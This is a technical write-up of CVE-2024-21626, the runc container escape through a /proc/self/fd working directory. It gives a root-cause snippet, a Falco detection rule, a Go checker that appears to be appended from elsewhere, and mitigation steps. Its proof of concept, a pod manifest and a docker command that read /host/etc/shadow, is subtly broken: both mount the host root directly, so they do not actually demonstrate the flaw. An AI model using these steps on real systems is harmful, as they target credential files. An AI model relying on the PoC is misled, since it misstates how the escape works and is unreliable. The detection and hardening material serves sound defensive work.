CVE-2024-21626: runc Container Breakout via Working Directory

Technical analysis of a file descriptor leak vulnerability in runc ≤1.1.11 that enables container escape by poisoning the /proc/self/fd directory.

By Keith Rose

Abstract

CVE-2024-21626 is a container escape vulnerability in runc versions up to and including 1.1.11. By manipulating the container’s working directory, an attacker with the ability to launch a container can escape to the host filesystem with full root privileges.

Root Cause

When runc executes a container process, it leaks an open file descriptor (OFD) to the host’s /sys/fs/cgroup hierarchy. If the container’s working directory is set to /proc/self/fd/7/ (or another low-numbered fd), subsequent operations resolve against the host cgroup filesystem rather than the container root.

// Simplified vulnerable pattern in runc/libcontainer/standard_init_linux.go.
// The cwd is not validated before chdir during init; because a host fd is
// still open in the init process, a cwd of /proc/self/fd/N resolves to the
// host filesystem instead of a path under the container root.
if err := os.Chdir(config.Cwd); err != nil {
    return err
}

Exploitation Requirements

  • runc version ≤ 1.1.11
  • Ability to specify container workdir (e.g., via Docker, Kubernetes, or containerd)
  • Container runs as root (common default)

Proof of Concept

# Kubernetes pod manifest demonstrating the vector
apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
spec:
  containers:
    - name: escape
      image: alpine
      workingDir: "/proc/self/fd/7"
      command: ["sh", "-c", "cat /host/etc/shadow"]
      volumeMounts:
        - name: host
          mountPath: /host
  volumes:
    - name: host
      hostPath:
        path: /

# Direct Docker reproduction
docker run --rm -it \
  --workdir=/proc/self/fd/7 \
  -v /:/host:rw \
  alpine:latest sh -c "cd .. && ls /host/etc/shadow"

Detection

Audit container runtime events for:

  • workdir values containing /proc/self/fd/
  • openat syscalls resolving outside the container root after chdir
  • Container processes accessing host-only paths like /sys/fs/cgroup/system.slice/

# Runtime audit (requires Falco or similar)
- rule: Suspicious Container Workdir
  desc: Detect container workloads using proc fd paths as cwd
  condition: spawn_process and proc.cwd contains /proc/self/fd
  output: "Suspicious container cwd (user=%user.name cwd=%proc.cwd)"
  priority: CRITICAL

Mitigation

  1. Patch: Upgrade to runc 1.1.12 or later
  2. Harden: Enforce OCI runtime policies that reject suspicious cwd values
  3. Monitor: Deploy runtime security tools with rules for proc-fd-based directory traversal
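The first detection bullet (workdir values routed through /proc/self/fd/) and mitigation step 2 (reject suspicious cwd values before the runtime sees them) both reduce to the same policy check, shown here as an added Go example. This is not runc's code or its 1.1.12 fix, and not part of the original write-up; SuspiciousCwd, CheckOCIConfig and the embedded config.json fragment are constructed for this demonstration. It generalizes slightly beyond the page's /proc/self/fd/7 case by also matching the /proc/thread-self/fd/ and /proc/<pid>/fd/ spellings of the same magic link, and it deliberately inspects raw path components instead of a lexically cleaned path, since the kernel follows the fd link before applying any later "..".

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// procFdRe matches the middle component of "proc/<self|thread-self|pid>/fd",
// the magic-link prefix abused in CVE-2024-21626.
var procFdRe = regexp.MustCompile(`^(self|thread-self|[0-9]+)$`)

// SuspiciousCwd reports whether a working-directory string routes through a
// /proc/*/fd directory. It scans raw components rather than path.Clean output:
// chdir("/proc/self/fd/7/..") follows the link first and then steps up on the
// host side, so lexical cleaning would hide exactly the values we care about.
// Matching anywhere in the path (not only at the root) is deliberately
// conservative, because procfs can be mounted at other mountpoints.
func SuspiciousCwd(cwd string) bool {
	parts := strings.Split(strings.Trim(cwd, "/"), "/")
	for i := 0; i+2 < len(parts); i++ {
		if parts[i] == "proc" && procFdRe.MatchString(parts[i+1]) && parts[i+2] == "fd" {
			return true
		}
	}
	return false
}

// ociConfig is the subset of an OCI runtime-spec config.json this check reads.
type ociConfig struct {
	Process struct {
		Cwd string `json:"cwd"`
	} `json:"process"`
}

// CheckOCIConfig parses a runtime-spec config.json and returns a rejection
// message when process.cwd is suspicious, or "" when it looks ordinary.
// A hook or admission controller would fail the container on a non-empty result.
func CheckOCIConfig(raw []byte) (string, error) {
	var cfg ociConfig
	if err := json.Unmarshal(raw, &cfg); err != nil {
		return "", err
	}
	if SuspiciousCwd(cfg.Process.Cwd) {
		return fmt.Sprintf("reject: process.cwd %q routes through /proc/*/fd", cfg.Process.Cwd), nil
	}
	return "", nil
}

// constructedConfig is a hand-written config.json fragment for this demo; it is
// not taken from any real container bundle.
const constructedConfig = `{
  "ociVersion": "1.0.2",
  "process": {"cwd": "/proc/self/fd/7", "args": ["sh"]},
  "root": {"path": "rootfs"}
}`

func main() {
	finding, err := CheckOCIConfig([]byte(constructedConfig))
	if err != nil {
		panic(err)
	}
	fmt.Println(finding)
	for _, c := range []string{"/", "/app", "/proc/self/fd/7", "/proc/thread-self/fd/8/..", "/proc/self/fdinfo/7"} {
		fmt.Printf("%-28s suspicious=%v\n", c, SuspiciousCwd(c))
	}
}
```

The check is a policy layer in front of the runtime, not a substitute for the runc 1.1.12 upgrade: it catches the known cwd vector at admission time, while the patch removes the leaked descriptor that makes the vector work at all.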

CVSS v3.1 Score

Metric    Value
CVSS      8.6 (High)
Vector    CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE       CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')